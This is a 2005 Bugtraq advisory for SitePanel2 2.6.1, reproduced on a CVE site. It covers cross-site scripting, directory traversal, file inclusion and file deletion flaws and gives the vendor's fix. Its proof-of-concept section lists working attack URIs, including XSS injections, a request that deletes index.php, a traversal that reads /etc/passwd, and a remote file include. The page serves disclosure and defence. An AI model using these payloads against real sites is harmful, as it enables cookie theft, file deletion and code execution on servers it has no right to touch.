SitePanel2 Multiple Input Validation Vulnerabilities

BID:13481

Info

SitePanel2 Multiple Input Validation Vulnerabilities

Bugtraq ID: 13481
Class: Input Validation Error
CVE:
Remote: Yes
Local: No
Published: May 03 2005 12:00AM
Updated: May 03 2005 12:00AM
Credit: James Bercegay of the GulfTech Security Research Team is credited with the discovery of these vulnerabilities.
Vulnerable: SitePanel SitePanel2 2.6.1
Not Vulnerable: SitePanel SitePanel2 2.6.1 .1

Discussion

SitePanel2 Multiple Input Validation Vulnerabilities

SitePanel2 is affected by multiple input validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.

Multiple cross-site scripting issues affect the application. An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user. This may facilitate the theft of cookie-based authentication credentials as well as other attacks.

SitePanel2 is prone to a directory traversal vulnerability. This vulnerability could be exploited to retrieve sensitive or privileged information normally accessible to the Web server.

The application is also vulnerable to file include, upload and deletion vulnerabilities. These issues could permit the execution of arbitrary code in the context of the affected Web site or the deletion of arbitrary files accessible to the application.

Exploit / POC

SitePanel2 Multiple Input Validation Vulnerabilities

No exploit is required.

The following proof of concept URI's are available:
http://www.example.com/users/main.php?p=5&do=2&v=177%22%3E[XSS]
http://www.example.com/admin/5.php?do=chsev&postid=177&usernamess=test&inadmin=no%22%3E[XSS]
http://www.example.com/admin/5.php?do=chsev2&postid=177&usernamess=test&inadmin=no&newsev=4%22%3E[XSS]
http://www.example.com/admin/5.php?do=chsev&postid=177%22%3E[XSS]&usernamess=test&inadmin=no
http://www.example.com/users/main.php?p=5&do=0&show=closed%22%3E[XSS]
http://www.example.com/admin/0.php?do=ratekb&id=11%22%3E[XSS]
http://www.example.com/users/main.php?p=6&do=0&v=post&id=11&sec_name=Blah%22%3E[XSS]

Arbitrary file deletion proof of concept:
http://www.example.com/admin/5.php?do=rmattach&rm=yes&id=../index.php

Directory traversal proof of concept:
http://www.example.com/users/index.php?lang=en.inc/../../../../../../etc/passwd%00

File include proof of concept:
http://www.example.com/users/main.php?p=http://www.example.com

Solution / Fix

SitePanel2 Multiple Input Validation Vulnerabilities

Solution:
The vendor has addressed this issue in SitePanel2 version 2.6.1.1.


SitePanel SitePanel2 2.6.1

References

SitePanel2 Multiple Input Validation Vulnerabilities

References:
© CVE.report 2026 |

Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. It is the responsibility of user to evaluate the accuracy, completeness or usefulness of any information, opinion, advice or other content. EACH USER WILL BE SOLELY RESPONSIBLE FOR ANY consequences of his or her direct or indirect use of this web site. ALL WARRANTIES OF ANY KIND ARE EXPRESSLY DISCLAIMED. This site will NOT BE LIABLE FOR ANY DIRECT, INDIRECT or any other kind of loss.

CVE, CWE, and OVAL are registred trademarks of The MITRE Corporation and the authoritative source of CVE content is MITRE's CVE web site. This site includes MITRE data granted under the following license.

Free CVE JSON API cve.report/api

CVE.report and Source URL Uptime Status status.cve.report